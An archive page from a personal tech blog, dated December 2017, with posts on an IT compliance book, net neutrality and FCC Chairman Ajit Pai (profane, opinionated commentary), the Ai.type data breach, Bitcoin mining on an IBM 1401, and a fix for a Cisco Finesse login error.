Dec 8, 2017

Book Review: Security and Privacy in an IT World: Managing and Meeting Online Regulatory Compliance in the 21st Century

My good friend and mentor (Basically the guy who taught me everything I know about Linux) , Craig MacKinder, recently wrote a book! It is called Security and Privacy in an It World: Managing and Meeting Online Regulatory Compliance in the 21st Century.

MacKinder is the owner of Blueshift Information Systems Inc, has been in the IT industry for over twenty years, and he's probably forgotten more about the business than I may ever know. When he told me that he wrote a book, I was pretty excited about it!

Here is a description of the book from Amazon:
Regulatory compliance has historically been a concern of only a company's legal and finance departments. However, as e-commerce continues to dominate retail both in the United States and abroad, regulatory compliance is now a major area of concern for IT managers, everyone on executive teams, and entire boards of directors. 
Amid a recoiling global marketplace and bigger and more costly cyberattacks, the nexus of "what can our networks do" versus "what are our networks allowed to do" is ever more complex. New privacy regulations coming from some of the closest allies of the United States are increasing the need for all companies doing business online to understand and abide by regulations that are in constant flux. 
On top of these concerns, the U.S. government itself is in a rocky place with domestic politics threatening to stand in the way of business as usual for American companies. How will CEOs navigate this minefield centered around Internet freedom? It will require boardrooms and network managers to focus in partnership on meeting new privacy mandates while also keeping networks safe from cyberattacks and data theft.
MacKinder sent me a copy of the book shortly after it published, and I have to say that I really like it.

It's not a terribly big book, and you can easily read through it in a week or so. It's also written in a manner that is not super technical, and helps give you an easy to follow understanding of the security threats businesses face, as well as the regulatory requirements businesses must adhere to in order to protect client and business data.

It also discusses the politics of IT security and government regulations, and how it impacts global trade and e-commerce. There is also good information about dealing with complex and conflicting Internet regulations.

Overall, I highly recommend this book for IT managers, executives, and board members!

If you are having a hard time getting someone on the executive team to understand the security and regulatory compliance challenges you face as an IT professional, you might consider buying a few copies for them and hand them out as gifts!


Dec 7, 2017

Former FCC Chairman Tom Wheeler Says Ajit Pai is Selling Out Consumers At Behest of ISP's

On Monday we reported that Ajit Pai would not delay their vote to overturn Obama era protections of net neutrality. This was in response to senators requesting that the FCC delay their vote.

One can only assume this is because Ajit Pai is an asshole that doesn't give a shit about consumers, and only the interests of ISP's. One might also speculate that he is probably taking bribes from ISP giants like Verizon and AT&T... I digress...

Anyway, yesterday Pai's predecessor, Tom Wheeler slammed Ajit Pai's plan to eliminate net neutrality. He basically called Pai out for selling out consumers and entrepreneurs at the hands of large ISP's.

Via Ars Technica:
"ISP monopoly carriers have been trying for four years to get to this point," Wheeler said, pointing to a 2013 story in The Washington Post about how telecoms were trying to "shift regulation of their broadband businesses to other agencies that don't have nearly as much power as the FCC." 
Pai's elimination of net neutrality rules, scheduled for a vote on December 14, will also shift consumer protection responsibility to the Federal Trade Commission and forbid state and local governments from writing their own net neutrality rules. 
"It is a classic example of regulatory capture, where the regulatory agency bends to the wishes of those they are supposed to oversee," Wheeler said today during a press conference with US Rep. Anna Eshoo (D-Calif.) and Sen. Ed Markey (D-Mass.).
If you don't think this whole thing stinks, you need to get your nose checked. We are all on the brink of losing the ultimate freedom humanity has ever created, and it's all about money.

What do you think of Ajit Pai, or his plans to kill net neutrality? Let us know in the comments!

Dec 6, 2017

Over 31 Million Ai.type user's info leaked in massive data breach

Researchers from Kromtech Security center have discovered that personal information from around 31 million users have been leaked online due to a security vulnerability in the popular smartphone keyboard app Ai.type. The data was found online and can be accessed by anyone without a password.

Via The Hacker News:
Founded in 2010, Ai.type is a customizable and personalizable on-screen keyboard for mobile phones and tablets, with more than 40 million users worldwide. 
Apparently, a misconfigured MongoDB database, owned by the Tel Aviv-based startup AI.type, exposed their entire 577 GB of the database online that includes a shocking amount of sensitive details on their users, which is not even necessary for the app to work. 
"...they appear to collect everything from contacts to keystrokes."
The leaked database of over 31 million users includes:
  • Full name, phone number, and email address
  • Device name, screen resolution and model details
  • Android version, IMSI number, and IMEI number
  • Mobile network name, country of residence and even user enabled languages
  • IP address (if available), along with GPS location (longitude/latitude).
  • Links and the information associated with the social media profiles, including birth date, emails, photos.
"When researchers installed Ai.Type they were shocked to discover that users must allow 'Full Access' to all of their data stored on the testing iPhone, including all keyboard data past and present," the researchers say.
If you are an Ai.type user, it's already too late, but I'd still uninstall it if I were you...

Dec 5, 2017

Mining Bitcoin on a 55 year old IBM mainframe works worse than expected

I ran into an interesting blog post today where a guy named Ken Shirriff decided to test what would happen if you mined Bitcoin on a 55 year old IBM 1401 mainframe! If you think he was able to really crank out hashes on that old giant monstrosity using punch cards and assembly language, well... you would be wrong.

Via www.righto.com:
The IBM 1401 can compute a double SHA-256 hash in 80 seconds. It requires about 3000 Watts of power, roughly the same as an oven or clothes dryer. A basic IBM 1401 system sold for $125,600, which is about a million dollars in 2015 dollars. On the other hand, today you can spend $50 and get a USB stick miner with a custom ASIC integrated circuit. This USB miner performs 3.6 billion hashes per second and uses about 4 watts. The enormous difference in performance is due to several factors: the huge increase in computer speed in the last 50 years demonstrated by Moore's law, the performance lost by using a decimal business computer for a binary-based hash, and the giant speed gain from custom Bitcoin mining hardware. 
To summarize, to mine a block at current difficulty, the IBM 1401 would take about 5x10^14 years (about 40,000 times the current age of the universe). The electricity would cost about 10^18 dollars. And you'd get 25 bitcoins worth about $6000. Obviously, mining Bitcoin on an IBM 1401 mainframe is not a profitable venture...
...Implementing SHA-256 in assembly language for an obsolete mainframe was a challenging but interesting project. Performance was worse than I expected (even compared to my 12 minute Mandelbrot). The decimal arithmetic of a business computer is a very poor match for a binary-optimized algorithm like SHA-256. But even a computer that predates integrated circuits can implement the Bitcoin mining algorithm. And, if I ever find myself back in 1960 due to some strange time warp, now I know how to set up a Bitcoin network.
Ken went on to say that he didn't actually mine real Bitcoin using this museum computer, but he did actually create and run the SHA-256 algorithm on the IBM 1401, showing that mining is possible in theory. He verified that he was able to find a successful hash by comparing it against one that had already been mined.

Line printer and IBM 1401 via righto.com
Even though it doesn't really make any sense to try and attempt mining on such old hardware, this little experiment is kind of fun an interesting in my opinion.

What do you think? Let us know in the comments!

Dec 4, 2017

FCC Chairman Ajit Pai basically tells net neutrality supporters they can eat a bag of dicks

FCC Chairman, Ajit Pai (Asshole)
OK, to be perfectly honest, the title of this blog post is not an exact quote. FCC Chairman, Ajit Pai did not actually tell net neutrality supporters that they can eat a bag of dicks, but he might as well have.

According to our last blog post, 28 senators were asking the FCC to delay their vote on repealing net neutrality regulations implemented by the Obama administration. Well, Ajit Pai said they will not be delaying the vote, and also said net neutrality supporters are "desperate".

Via Ars Technica:
The Federal Communications Commission will move ahead with its vote to kill net neutrality rules next week despite an unresolved court case that could strip away even more consumer protections. 
FCC Chairman Ajit Pai says that net neutrality rules aren't needed because the Federal Trade Commission can protect consumers from broadband providers. But a pending court case involving AT&T could strip the FTC of its regulatory authority over AT&T and similar ISPs. 
A few dozen consumer advocacy groups and the City of New York urged Pai to delay the net neutrality-killing vote in a letter today. If the FCC eliminates its rules and the court case goes AT&T's way, there would be a "'regulatory gap' that would leave consumers utterly unprotected," the letter said.
Sorry folks, there will be no delay. Hopefully Pai is right and the FTC can protect consumers from broadband carriers without regulations, but I wouldn't hold my breath!

What do you think about this? Let us know in the comments!

Senators Asking FCC to Delay Net Neutrality Vote

Citing concerns over the possibility that fake comments will be used to file the agency's public comment, twenty-eight senators are calling on the FCC to delay it's vote on repealing net neutrality rules that were put in place during the Obama Administration.

Via The Hill:
The group, led by Sen. Maggie Hassan (D-N.H.), wants the FCC to conduct an investigation into whether the net neutrality docket’s public comment record was tampered with. 
“A free and open Internet is vital to ensuring a level playing field online, and we believe that your proposed action may be based on an incomplete understanding of the public record in this proceeding,” the senators wrote in a letter to FCC Chairman Ajit Pai. “In fact, there is good reason to believe that the record may be replete with fake or fraudulent comments, suggesting that your proposal is fundamentally flawed.” 
The group included Sens. Charles Schumer (D-N.Y.), Bernie Sanders (I-Vt.) and Elizabeth Warren (D-Mass.). All of the senators who signed the letter are net neutrality supporters. 
The FCC will vote on Dec. 14 to scrap the Obama-era rules that prevent internet service providers from discriminating against certain content. The agency was flooded nearly 22 million comments, a record, when it sought public input on Pai’s plan to repeal the rules.
The letter cited New York Attorney General Eric Schneiderman’s investigation into fake comments filed with the FCC on net neutrality. Schneiderman said last month that his office had found that “tens of thousands” of New York residents may have been impersonated by fake commenters. 
The senators also noted that 50,000 net neutrality consumer complaints may not have been included in the public record.
Hopefully the FCC will listen to the senators and delay the vote. Many people are rightfully up in arms over this. The idea of net neutrality is to keep the internet free, and not allow ISP's to charge you extra to view the content you want to see.

Here is a pretty funny infographic explaining it via Imgur from back in July:



What do you think about this? Are you for or against net neutrality? Why or why not? Let us know in the comments!

Cisco Finesse Cannot Authenticate With The Notification Service

I love waking up in the morning extra early, and hearing the lovely sound of my IM client at my computer (I work from home). It usually means that something is broken for someone. Well, this morning was no different. I got a message from one of my company's client support folks saying that she couldn't get into the Cisco Finesse phone queue, and that she was getting an error saying that it failed to load workflows.

When I tried logging in myself, I was greeted with a much different message. I got a message saying:

Cisco Finesse
Cannot authenticate with the notification service. There may be a configuration mismatch. Please contact your administrator.


Well shit... That's no good...

Anyway, I decided to try logging into Cisco Unified CCX Administration. When I logged in there I was greeted with a different message. This one said:

The Cisco JTAPI Client versions are inconsistent. Please go to Cisco JTAPI Resync in the Unified CM Telephony Subsystem to install the Cisco JTAPI Client.


Well shit... That's no good...

So I decided to follow instructions. From within Cisco Unified CCX Administration I went to Subsystem > Cisco Unified CM Telephony > Cisco JTAPI Resync. Then clicked OK when prompted.


After that I got another message saying:

For changes to take effect, please restart the Cisco Unified CCX Engine.

In order to do that, I had to go into Cisco Unified CCX Serviceability. Once in there I had to browse to Tools > Control Center - Network Services.


Once in there I had to find Cisco Unified CCX Engine service and restart it. Once that was done, I restarted the Cisco Finesse Tomcat service as well. After that users were able to login to the call queues again!

Did this post help you out? Let us know in the comments!



Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | stopping spam